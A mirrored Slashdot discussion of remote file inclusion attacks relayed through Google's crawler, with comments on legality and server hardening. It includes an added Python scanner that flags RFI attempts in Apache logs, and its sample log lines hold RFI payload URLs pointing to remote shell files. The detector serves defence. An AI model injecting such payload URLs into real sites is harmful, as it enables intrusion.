Slashdot Mirror


Anonymizing RFI Attacks Through Google

netbuzz writes "Noam Rathaus on his SecuriTeam blog describes a technique by which 'Google can be utilized to hack into websites — actively exploiting them (not information gathering by the use of "Google hacking," although that is how most of the sites vulnerable to RFI attacks are found).' He cites examples in the wild and even mentions that the technique could be used as a 'covert' communications channel."

18 of 66 comments

  1. but is it a crime... by Sensor · · Score: 5, Interesting

    There is actually quite an interesting aside to this: would someone who used this technique actually be guilty of hacking? After all, they don't run the exploit and arguably can't guarantee that anyone will.

    If I happen to create a utility capable of cracking a site but then store it for research, never distribute it and never actively use it, then I've not committed a crime. If I distribute it to other researchers in good faith then I'm covered - at present it's only the person who actively uses it that is guilty of a crime.

    However, in this scenario (even if I could be traced) it's arguable that *I* never attacked a site; all I did was to place a tool that could be used in that way in a public location. I'm not sure that would completely stand up given the recent amendment to the UK's Computer Misuse Act (i.e. reasonable belief that the tool would not be used in that fashion), but still...

    As always it comes down to people...

    PS:
    As an aside, I am currently running a survey for my MSc dissertation on IT admin access to confidential information. If you'd like to help out (and would like a shot at winning a £25 or $40 Amazon voucher) then please take a look at:

    https://msc-survery.priogenus.com/amazon.php

    1. Re:but is it a crime... by MartinJW · · Score: 2, Interesting

      I'm not so sure. The intent is there to commit the crime, and it's safe to assume that once the attack has taken place, the malicious user will be utilising the now open security hole for further ends. I guess it's a bit like getting a friend to kill someone - you would still be guilty of murder - wouldn't you?

    2. Re:but is it a crime... by Sensor · · Score: 2, Interesting

      Technically "conspiracy to murder", but could you prove the case if you left a note in your "private" diary that you thought someone could be killed in a certain fashion... and someone then read your diary and chose to act upon it?

    3. Re:but is it a crime... by Not_Wiggins · · Score: 2, Insightful

      but could you prove the case if you left a note in your "private" diary that you thought someone could be killed in a certain fashion...

      I'll preface this by saying IANAL...
      Prove? No. Provide circumstantial evidence? Yup.

      As the grandparent stated, the real judgment behind this crime is one of intent. The nature of these links is so specific, targeted and intentional, that even if one didn't get accused of willful attacking, he'd be guilty of negligence.

      Maybe it doesn't seem as clear-cut because we're "just talking about words."

      But the web provides action to words, real things that can happen based on materials produced. So, if we put the question within a different context, maybe the "crime" part becomes more apparent:

      How would you feel about a nuclear materials researcher leaving weapons-grade plutonium in an unlocked box in his back yard while posting a notice in the local paper that such material exists unprotected for anyone to harvest? Would he be making the bomb himself and destroying people with it? No. Would it be tantamount to such an act? Yes.

      I don't know how it would be prosecuted, but there's no doubt that it would be.

      I think the reason there's even question of legality to these types of attacks isn't because the moral implications are ambiguous, but because the law hasn't been able to keep up with the latest in cybercrime.

      --
      Diplomacy is the art of saying, "Nice doggie!" until you can find a rock.
    4. Re:but is it a crime... by Opie812 · · Score: 2, Funny

      as someone whose father actually is a vicar...

      Are you new to slashdot? The proper way to phrase this....ummmm...phrase is as follows:

      My father's a vicar you insensitive clod!

      :)

      --
      I'm not a nerd. Nerds are smart.
  2. Anonymous? by tttonyyy · · Score: 3, Informative

    Aside from triggering the attack, how does this make it anonymous?

    Surely the "http://URI-with-malicious-code.php" section will still create logs on the victim server pointing to the source of the malicious code (but perhaps not who triggered it).

    --
    biopowered.co.uk - catalytically cracking triglycerides for home automotive use since 2008. Just say no to big oil!
    1. Re:Anonymous? by Zedrick · · Score: 3, Informative

      Yes, but the URI-with-malicious-code is usually something like: http://www.geocities.com/xxxxxxx/xxx.txt

      At least that's what I usually see every time I check the logs of a website I'm going to shut down for allowing foreign includes (to be run).

  3. change behaviour for bots by cucucu · · Score: 4, Informative

    In your server, you can code the logic to take another action if the user agent is a bot.
    Here you have a db of web robots.

  4. In reality... by lpiob · · Score: 2, Insightful

    It's a feature, not a bug.

  5. How not Who by MartinJW · · Score: 5, Informative

    If your web application is vulnerable to attack then I would have thought it makes no difference where that attack comes from - be it a 'real' person or a search bot. You should spend more time worrying about whether your application is secure, the how is more important than the who.

    1. Re:How not Who by deryckh · · Score: 2, Interesting

      Agreed. The problem I have with these sorts of things is they act as if the problem is with Google. It's not (or any other search engine for that matter). The problem is with the site that is vulnerable. Fix the security hole and there's nothing to worry about.

  6. Re:RFI by Anonymous Coward · · Score: 2, Informative
  7. Remote File Inclusion by Bogtha · · Score: 4, Informative

    Remote File Inclusion. It's a pretty poor term for this type of attack, because it's not the act of inclusion that causes the problem, it's the act of requesting the file in the first place.

    --
    Bogtha Bogtha Bogtha
  8. RFI? How about defining this? by Ashtead · · Score: 5, Informative

    Radio Frequency Interference? Request for Information? Radio France Internationale? Rodent Fangs Implementation? WHAT?

    How about explaining what such an ambiguous acronym actually means initially? As neither TFA nor the summary seems to have done so, I therefore will have to do it here, just to make heads and tails of the rest of the discussion and perhaps illuminate someone else. Hit Google, slog through a pile of links indicating one of the above, or some company whose name includes the three letters. There are many of these. On page 3 I found the Wikipedia page for this TLA, on which there is a dead link to what this must be: Remote File Inclusion.

    How about that.

    I was wondering if it was just me, that I had been off-line for too long (like 2 days) and missed out on the latest and greatest buzzword, again?

    --
    SIGBUS @ NO-07.308
    1. Re:RFI? How about defining this? by hey! · · Score: 3, Informative

      I'm guessing from the text of the article it is Remote File Inclusion.

      The description of the mechanism doesn't really make sense. If you can exploit a victim site by feeding it an evil URL in a form parameter, why use Google at all? You've lost anonymity by including the URL.

      Looking at the described effects, it sounds like what they do is feed google some malicious code wrapped up in something that looks like a URL on the victim site. Then Google spiders the URL, placing malicious content in the form parameters.

      So, suppose you have a malicious SQL injection attack that causes your database to dump the password table to a remote database. The trick is that you get Google to launch the attack for you. You have the malicious code obfuscate the destination, and it isn't clear skullduggery is going on by casual inspection of the logs. It won't show up in the database logs either because it's not a transaction.

      --
      Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
    2. Re:RFI? How about defining this? by Fatalis · · Score: 2, Funny

      Yes, WTF is a TLA.

      --
      Deus est fatalis
  9. Simple solution by vivekg · · Score: 4, Interesting

    Seriously, I hate to read articles like this one. They don't offer any solution..... These kinds of attacks are not new at all; you can find tons of such attacks in the access.log file:

    tail -f /var/log/httpd/access.log

    First, get rid of fat Apache and use something small and secure like lighttpd if you are running a *small personal* web site. Second, put lighttpd / Apache in a chrooted jail and no one can install a *php/perl* shell. I have documented the procedure for putting lighttpd in a jail:

    http://www.cyberciti.biz/tips/howto-setup-lighttpd-php-mysql-chrooted-jail.html

    Both Yahoo and Google run their entire web servers in chrooted jails. Another choice is to use OpenBSD, which runs Apache in a chrooted jail out of the box.

    --
    The important thing is not to stop questioning --Albert Einstein.
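An added example (not from the article or any commenter) of the log check Zedrick and vivekg describe above: it parses Apache combined-format access.log lines and flags query parameters carrying an absolute URL to a host you don't own, which is the trace an RFI attempt leaves whether a person or Googlebot sent the request. The log lines, IP addresses and hostnames are constructed; the geocities .txt URL shape is the one Zedrick mentions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" access log line (the access.log format tailed above).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
REMOTE_SCHEMES = ("http", "https", "ftp")

def rfi_findings(log_lines, own_hosts):
    """Flag requests whose query string carries an absolute URL to a host we do
    not own: the shape an RFI payload leaves in the log, whoever sends it."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for name, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
            p = urlsplit(value)
            if p.scheme in REMOTE_SCHEMES and p.hostname and p.hostname not in own_hosts:
                findings.append({
                    "src_ip": m.group("ip"), "param": name,
                    "payload_host": p.hostname, "payload_url": value,
                    "via_crawler": "Googlebot" in m.group("ua"),
                })
    return findings

def payload_hosts(findings):
    """Distinct hosts serving the included code: the lead that survives even
    when the request itself arrived from a crawler's address."""
    return sorted({f["payload_host"] for f in findings})

# Constructed sample lines (documentation IPs, .example hosts); own host is
# www.example.com, so the last line is a legitimate self-reference.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2008:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2008:10:00:02 +0000] "GET /index.php?page=http://www.geocities.com/xxxxxxx/xxx.txt HTTP/1.1" 200 88 "-" "Mozilla/4.0"',
    '198.51.100.12 - - [10/Jan/2008:10:00:03 +0000] "GET /index.php?page=http://payload-host.example/shell.txt HTTP/1.1" 200 88 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '203.0.113.9 - - [10/Jan/2008:10:00:04 +0000] "GET /index.php?page=http://www.example.com/about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
OWN_HOSTS = {"www.example.com"}

if __name__ == "__main__":
    for f in rfi_findings(SAMPLE_LOG, OWN_HOSTS):
        who = "crawler-relayed" if f["via_crawler"] else "direct"
        print(f'{f["src_ip"]:>14} {who:15} {f["param"]}={f["payload_url"]}')
```

A parameter that legitimately carries URLs (a redirect target, say) will be listed too, so treat the output as triage input; the payload host is what to follow up on, not the crawler's address.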
  10. Glasshouses... by ArsenneLupin · · Score: 2, Informative

    ... The Daily WTF runs on ASPX. These are bold people. Very bold people.